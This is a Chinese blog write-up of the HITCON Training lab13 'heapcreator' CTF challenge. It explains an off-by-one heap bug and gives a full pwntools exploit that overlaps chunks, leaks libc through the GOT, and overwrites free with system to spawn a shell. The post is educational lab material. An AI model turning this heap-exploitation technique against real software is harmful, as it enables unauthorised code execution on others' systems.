pwn HITCON Trainging lab13

最新推荐文章于 2022-08-22 12:51:01 发布
最新推荐文章于 2022-08-22 12:51:01 发布
阅读量241 收藏 1
点赞数 1
分类专栏: 题目 学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/102411993
版权

emem其实我的结构体学的不太好

结构体大概为这样:
struct
{
    char *heaparray[i];
    char conten[20]
}
edit heaparray->content

编辑的地方存在一个off by one的漏洞我们可以修改下一个chunk的大小然后释放申请该大小的chunk造成堆溢出~~
简单点说就是先创建三个堆块在第一个堆块写入’/bin/sh\x00’然后修改第二个堆块的size然后释放再申请一个大的堆块覆盖第三个堆块泄露system函数地址再修改got表释放第一个堆块getshell
exp:

from pwn import *
from LibcSearcher import *
libc=ELF('./libc6_2.23-0ubuntu10_amd64.so')
p=process('./heapcreator')
elf=ELF('./heapcreator')
def debug():
	gdb.attach(p)

def create(size,content):
	p.recvuntil('choice :')
	p.sendline('1')
	p.recvuntil('Heap : ')
	p.sendline(str(size))
	p.recvuntil('heap:')
	p.sendline(content)

def edit(idx,content):
	p.recvuntil('choice :')
	p.sendline('2')
	p.recvuntil(' :')
	p.sendline(str(idx))
	p.recvuntil('heap :')
	p.sendline(content)

def show(idx):
	p.recvuntil('choice :')
	p.sendline('3')
	p.recvuntil(' :')
	p.sendline(str(idx))

def delete(idx):
	p.recvuntil('choice :')
	p.sendline('4')
	p.recvuntil(' :')
	p.sendline(str(idx))
#debug()
create(0x18,'aaa')  #idx 0
create(0x10,'bbbb') #idx 1
create(0x10,'cccc')  #idx 2
edit(0,'/bin/sh\x00'+p64(0)*2+'\x81')
delete(1)

create(0x70,p64(0)*8+p64(0x8)+p64(elf.got['free']))
show(2)
free_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
log.success('free_addr: '+hex(free_addr))
#libc=LibcSearcher('free',free_addr)
#free_addr=free_addr-libc.dump('free')
libcbase=free_addr-libc.symbols['free']
system_addr=libcbase+libc.symbols['system']
log.success('system_addr: '+hex(system_addr))
edit(2,p64(system_addr))
debug()
delete(0)
p.interactive()
doudoudedi
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
堆溢 HITCON Trainging lab13
winterze的博客
04-14 247
chunk-extend学习,一个友好的题目,下载地址 0x00 程序分析 基本信息 [*] '/home/ububtu/ctf/pwn/heapcreator' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE:...
HITCON Trainging lab13——heapcreator
04-19 241
64位程序,没开PIE   #chunkoverlapping #off by one 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char *v3; // rsi 4 const char *v4; // rdi 5 char...
buuctf hitcontraining_heapcreator HITCON Trainging lab13
weixin_45677731的博客
08-10 990
这一题在wiki上面是有的,在Chunk Extend and Overlapping里面,个人觉得这一题对于我这种刚开始学习堆的人来说,是比较容易理解的一题 拖进IDA create_heap函数: 值得注意的是,他这里是会有两次malloc的,也就是说,你申请了一次,他就会创建两个chunk,第一个chunk是0x20大小的,可以看作是记录的作用,里面存放着第二个chunk的size和指针,同时,第一个chunk的地址指针保存在bss段中,heaparray数组这里: 这样述起来可能不太清晰,我申
HITCON Trainging lab13 heapcreator
snowleopard_bin的博客
10-03 982
记录第一次不看任何writeup自己写来的pwn题 前置知识: off by one chunk overlapping chunk extend 一开始先看程序打开哪些保护机制 可以改got,并且有点要注意是没开PIE,这样就不必泄露函数地址计算基址了(如果开了,这题堆上没有存放函数指针的,我也不会泄露。。) 然后分析程序,挖漏洞 首先从建堆函数看数据结构 结构...
Chunk Extend and Overlapping(HITCON Trainging lab13)
九层台
08-13 600
数据结构 unsigned __int64 create_heap() { _QWORD *v0; // rbx signed int i; // [rsp+4h] [rbp-2Ch] size_t size; // [rsp+8h] [rbp-28h] char buf; // [rsp+10h] [rbp-20h] unsigned __int64 v5; // [r...
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN占空比可变的方波。
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
pwn入门题目+exp
01-26
初级的ROP,附有完整exp,可以学一下
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
welpwn pwn 入门题
02-11
pwn 入门题
HITCON Trainging lab13——CTFwiki
qq_53928256的博客
08-22 1071
通过off by one溢修改next chunk的size域来实现overlap,修改指针实现执行system函数,获得系统权限
HITCON Trainging lab13 学习Chunk Extend and Overlapping 攻击
qq_36495104的博客
05-08 249
查看保护措施,RelRO为Partial,即可以修改GOT项 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-znarZnkX-1588937420199)(F:\wangpei\笔记\pwn\note\assets\1588837137968.png)] 这个题目,定义了一种heap结构体,大概如下 struct heap { size; #heap的大小;8字节 content; #指针,指向content;8字节 } 下面是main函数,定义了菜单选
HITCON-Training lab13 heapcreator(heap extend)
像初雪一样自由洒落
04-16 971
啊啊啊,搞了一早上,终于终于搞明白了,,, 题目链接:https://buuoj.cn/challenges#hitcontraining_heapcreator ida简单看一下 创建堆 编辑 对比建堆,可以看到size大了一个 打印 删除 程序基本功能就这样了 因为edit的时候可以多写入一个字节,存在off-by-one,我们可...
hitcontraning_lab13_writeup
【xiaoxiaorenwu's blog】
04-07 234
依然是wiki上的例题,先提供二进制源码:hitcontraning_lab13 预览: 文件是64位,partial relro则可以改写got,感觉就像是堆题(名字也叫heapcreator)。。。没有pie调试起来会方便很多。。。然后放进ida64看一下大致功能。 前言分析: 首先有两个setvbuf()设置好了标准输入和标准输的缓冲区,所以程序不会在heap段设置chunk,然后打...
Chunk Extend/Overlapping | 堆拓展、重叠
SkYe's Blog
08-06 1591
堆拓展&溢 绝大部分内容来自 CTF-WIKI ,内容引用用于学习记录 介绍 chunk extend 是堆漏洞的一种常见利用手法,通过 extend 可以实现 chunk overlapping 的效果。这种利用方法需要以下的时机和条件: 程序中存在基于堆的漏洞 漏洞可以控制 chunk header 中的数据 原理 chunk extend 技术能够产生的原因在于 ptmalloc 在对堆 chunk 进行操作时使用的各种宏。 在 ptmalloc 中,获取 chunk 块大小的操作如
pwn入门
热门推荐
九层台
03-27 1万+
之前学过一点关于pwn,不过总是断断续续,学一点就停止了,这次准备好好学一下。推荐一个网站这是个练习pwn的很好的网站 FD 先连上去 查看fd.c文件 main函数中:argc是命令行参数个数,char *argv[]是指所有命令行参数,char *envp[]是环境变量(argv[1]位置处存放的是命令行输入的第一个参数) atoi函数的作用是把字符转化为int型数据。 ...
BUUCTF get_started_3dsctf_2016
doudoudedi
10-04 1295
这道题和昨天差不多栈溢覆盖返回地址然后把bss段mprotect可读可写可执行然后写入shellcode跳入bss段即可 exp: from pwn import * def debug(): gdb.attach(p) #p=process('./getstarted') p=remote('node2.buuoj.cn.wetolink.com',28646) elf=ELF('./ge...
xctf ics-05 wp
doudoudedi
06-18 2691
今天刚考完数据库就来刷体了很累所以做了很久 诶还是不够仔细啊没有认真的做来 应该直接想到任意文件读取的诶 page=php://filter/read=convert.base64-encode/resource=index.php 爆源码: <?php error_reporting(0); @session_start(); posix_setui...
记一道简单的RIP覆盖的pwn(远程的话因为ubuntu18缘故所以栈需要对齐)
doudoudedi
06-03 2613
记一道BUUCTF简单的RIP覆盖的pwn 这个题目就是单纯的RIP覆盖 直接打开64位IDA 直接就有shell可以直接利用 然后就是算偏移了 直接用gdb-peda的工具算偏移为23 直接上exp: from pwn import * p=remote('buuoj.cn',6001) system=0x401186 payload='a'*23+p64(system) p.sendl...
BUUCTF pwn rip
01-28
根据提供的引用内容BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值